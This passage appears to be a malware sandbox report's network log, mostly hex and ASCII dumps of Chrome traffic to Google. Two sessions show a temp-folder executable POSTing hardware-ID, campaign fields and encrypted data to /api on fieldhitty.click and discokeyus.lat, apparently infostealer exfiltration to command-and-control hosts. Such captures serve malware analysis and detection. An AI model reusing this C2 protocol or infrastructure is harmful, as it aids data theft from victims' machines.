Q2g5eWxnNzM0Q0ZGUmllcVIrcHZ5SUhIUTR3ZERtRlZTeXl6Rm1SMjVVUnA0T2h0WUFVUE5JWGpJU2VNait0T2E4d2g3QlZrS1Q4cTBuQlQ5RHJCM1A0VlcvWFhGdnVRd3hJVWNxa1FsQmxhajZvd1VLSjduQUowQy8xcTdwVlJpZTVSbzdNR0hqQmFZNHlNNXg1QWRPQUJuSE9kYmJ3djhNcFZRZGoxUzVJN2lZUU8rTFQzY3BWSUkvVW9INVc
2024-12-22 01:18:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	50236	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50237	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:18:55 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:18:55 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:18:55 UTC	372	IN	Data Raw: 31 36 39 62 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 169b)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-22 01:18:55 UTC	1253	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-22 01:18:55 UTC	293	IN	Data Raw: 31 31 65 0d 0a 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 35 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 31 31 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a Data Ascii: 11e_placeholder_label":["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700265,3701384,102278205,102278211],"is_backup_bar":
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b Data Ascii: 8000pt":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d Data Ascii: 0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 Data Ascii: \u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\"
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e Data Ascii: return a\|\|null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")\|\|_.

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	50235	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:18:55 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:18:55 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:18:55 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-22 01:18:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50242	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:55 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AJV3B5NXXK1X4OPR04 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: fieldhitty.click
2024-12-22 01:18:55 UTC	15331	OUT	Data Raw: 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4a 56 33 42 35 4e 58 58 4b 31 58 34 4f 50 52 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 41 Data Ascii: --AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="pid"2--AJV3B5NXXK1X4OPR04Content-Disposition: form-data; name="lid"PvbArZ----A
2024-12-22 01:18:55 UTC	2827	OUT	Data Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
2024-12-22 01:18:56 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qnufls9jm85c55o3cqmkdm4k8p; expires=Wed, 16 Apr 2025 19:05:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2F7f4kCGVb4ijjeQ71JSHQBmUPiOMhWBOHDcP9GQwB2BvbPX8ILsTeSlCarlA6LgZy%2BDWsKWWoeWOUq%2BzIF%2FkqpYh8%2BJIDmML8%2BDkKvogH8%2BqlGF4wvu0kSlUuWUuhklYt3u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47dc68987d14-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1774&rtt_var=720&sent=19&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19120&delivery_rate=1465127&cwnd=245&unsent_bytes=0&cid=e1396eff345e5b18&ts=1073&x=0"
2024-12-22 01:18:56 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	50246	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:56 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=31HC62KAM5E5A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20407 Host: discokeyus.lat
2024-12-22 01:18:56 UTC	15331	OUT	Data Raw: 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 31 48 43 36 32 4b 41 4d 35 45 Data Ascii: --31HC62KAM5E5AContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--31HC62KAM5E5AContent-Disposition: form-data; name="pid"3--31HC62KAM5E5AContent-Disposition: form-data; name="lid"PsFKDg--pablo--31HC62KAM5E
2024-12-22 01:18:56 UTC	5076	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
